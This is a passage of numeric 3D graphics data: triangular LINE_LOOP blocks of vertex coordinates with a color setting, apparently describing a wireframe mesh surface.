VERTEX, 16.394, 38.352, 27.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.682, 37.980, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.619, 38.393, 27.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.825, 38.024, 27.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.758, 38.460, 27.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.800, 38.096, 27.007,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.729, 38.515, 27.178,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.621, 38.154, 26.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.550, 38.526, 27.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.324, 38.485, 27.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.223, 38.851, 27.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.186, 38.418, 27.225,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.088, 38.762, 27.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 16.214, 38.363, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.116, 38.709, 27.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.394, 38.352, 27.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.289, 38.724, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.619, 38.393, 27.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.506, 38.797, 27.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.758, 38.460, 27.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.640, 38.887, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.729, 38.515, 27.178,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.613, 38.940, 27.300,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.550, 38.526, 27.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.440, 38.925, 27.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.223, 38.851, 27.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.105, 39.247, 27.235,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 16.088, 38.762, 27.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 15.975, 39.137, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 16.116, 38.709, 27.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.001, 39.074, 27.608,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 16.289, 38.724, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.169, 39.095, 27.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.506, 38.797, 27.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.378, 39.188, 27.765,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.640, 38.887, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.508, 39.298, 27.611,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.613, 38.940, 27.300,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.482, 39.361, 27.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.440, 38.925, 27.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.315, 39.340, 27.236,
END,
COLOR, 0.000, 0.914, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.105, 39.247, 27.235,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 15.991, 39.660, 27.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.975, 39.137, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 15.866, 39.530, 27.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 16.001, 39.074, 27.608,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 15.896, 39.447, 27.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 16.169, 39.095, 27.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.063, 39.459, 27.816,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.378, 39.188, 27.765,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.269, 39.559, 27.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.508, 39.298, 27.611,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.394, 39.688, 27.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.482, 39.361, 27.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.364, 39.772, 27.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.315, 39.340, 27.236,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.197, 39.760, 27.315,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 15.991, 39.660, 27.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.903, 40.081, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.866, 39.530, 27.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 15.784, 39.933, 27.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.896, 39.447, 27.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 15.824, 39.818, 27.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 16.063, 39.459, 27.816,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.000, 39.803, 27.867,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.269, 39.559, 27.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.209, 39.897, 27.880,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.394, 39.688, 27.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.328, 40.045, 27.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.364, 39.772, 27.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.288, 40.160, 27.557,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.197, 39.760, 27.315,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.112, 40.175, 27.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 15.903, 40.081, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.870, 40.502, 27.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.784, 39.933, 27.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.756, 40.336, 27.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.824, 39.818, 27.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 15.813, 40.178, 27.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 16.000, 39.803, 27.867,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.006, 40.119, 27.927,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.209, 39.897, 27.880,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.223, 40.194, 27.925,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.328, 40.045, 27.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.336, 40.359, 27.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.288, 40.160, 27.557,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.280, 40.518, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.112, 40.175, 27.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 16.087, 40.577, 27.548,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 15.870, 40.502, 27.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.935, 40.892, 27.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 15.756, 40.336, 27.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.829, 40.711, 27.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 15.813, 40.178, 27.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 15.897, 40.509, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.006, 40.119, 27.927,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.099, 40.405, 28.008,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.223, 40.194, 27.925,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.318, 40.459, 27.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.336, 40.359, 27.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.424, 40.640, 27.871,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.280, 40.518, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.356, 40.842, 27.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.087, 40.577, 27.548,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 16.154, 40.946, 27.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 15.935, 40.892, 27.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 16.145, 41.200, 28.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 15.829, 40.711, 27.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 16.047, 41.005, 28.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 15.897, 40.509, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.111, 40.785, 28.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.099, 40.405, 28.008,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.300, 40.668, 28.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.318, 40.459, 27.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.503, 40.724, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.424, 40.640, 27.871,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.601, 40.919, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.356, 40.842, 27.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.537, 41.139, 27.977,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.154, 40.946, 27.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 16.348, 41.256, 28.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.145, 41.200, 28.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 16.425, 41.407, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.047, 41.005, 28.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 16.335, 41.202, 28.498,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.111, 40.785, 28.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.392, 40.984, 28.454,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.300, 40.668, 28.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.564, 40.881, 28.341,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.503, 40.724, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.749, 40.954, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.601, 40.919, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.839, 41.159, 28.176,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 16.537, 41.139, 27.977,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.781, 41.377, 28.220,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 16.348, 41.256, 28.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 16.609, 41.479, 28.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 16.425, 41.407, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.703, 41.524, 28.730,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.335, 41.202, 28.498,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.620, 41.313, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.392, 40.984, 28.454,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.671, 41.104, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.564, 40.881, 28.341,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.827, 41.019, 28.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 16.749, 40.954, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.996, 41.109, 28.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 16.839, 41.159, 28.176,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 17.080, 41.320, 28.378,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 16.781, 41.377, 28.220,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 17.029, 41.529, 28.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 16.609, 41.479, 28.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.873, 41.614, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 16.703, 41.524, 28.730,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.992, 41.568, 28.987,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 16.620, 41.313, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.913, 41.353, 29.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 16.671, 41.104, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.956, 41.154, 28.898,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 16.827, 41.019, 28.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 17.094, 41.089, 28.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 16.996, 41.109, 28.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 17.248, 41.195, 28.593,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.080, 41.320, 28.378,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 17.327, 41.410, 28.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.029, 41.529, 28.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 17.285, 41.608, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 16.873, 41.614, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 17.146, 41.673, 28.853,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 16.992, 41.568, 28.987,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 17.294, 41.550, 29.219,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 16.913, 41.353, 29.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 17.219, 41.333, 29.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 16.956, 41.154, 28.898,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 17.252, 41.146, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.094, 41.089, 28.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.094, 41.089, 28.727,
